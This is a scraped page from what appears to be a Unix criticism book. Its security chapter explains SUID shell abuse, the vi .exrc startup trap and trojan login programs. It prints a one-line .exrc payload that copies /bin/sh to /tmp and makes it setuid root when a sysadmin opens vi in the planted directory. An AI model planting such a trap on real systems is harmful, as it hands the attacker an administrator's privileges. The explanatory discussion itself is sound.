issuhub.com

ugh.book

(singke) #1

250 Security


run the newly created /tmp/.sh1 to read, delete, or run any of his files with-

out the formality of learning his password or logging in as him. If he’s got

access to a SUID root shell program (usually called doit), so do you. Con-

gratulations! The entire system is at your mercy.

Startup traps

When a complicated Unix program starts up, it reads configuration files

from either the user’s home directory and/or the current directory to set ini-

tial and default parameters that customize the program to the user’s specifi-

cations. Unfortunately, start up files can be created and left by other users

to do their bidding on your behalf.

An extremely well-known startup trap preys upon vi, a simple, fast screen-

oriented editor that’s preferred by many sysadmins.^ It’s too bad that vi

can’t edit more than one file at a time, which is why sysadmins frequently

start up vi from their current directory, rather than in their home directory.

Therein lies the rub.

At startup, vi searches for a file called.exrc, the vi startup file, in the cur-

rent directory. Want to steal a few privs? Put a file called.exrc with the

following contents into a directory:

!(cp /bin/sh /tmp/.s$$;chmod 4755 /tmp/.s$$)&

and then wait for an unsuspecting sysadmin to invoke vi from that direc-

tory. When she does, she’ll see a flashing exclamation mark at the bottom

of her screen for a brief instant, and you’ll have an SUID shell waiting for

you in /tmp, just like the previous attack.

Trusted Path and Trojan Horses

Standard Unix provides no trusted path to the operating system. We’ll

explain this concept with an example. Consider the standard Unix login

procedure:

login: jrandom

password: <type your “secret” password>

When you type your password, how do you know that you are typing to the

honest-to-goodness Unix /bin/login program, and not some treacherous

doppelganger? Such doppelgangers, called “trojan horses,” are widely

available on cracker bulletin boards; their sole purpose is to capture your

username and password for later, presumably illegitimate, use.
Free download pdf
Get our desktop app
Company
Features
Documentation
Resources
© ISSUHUB. 2024. All rights reserved.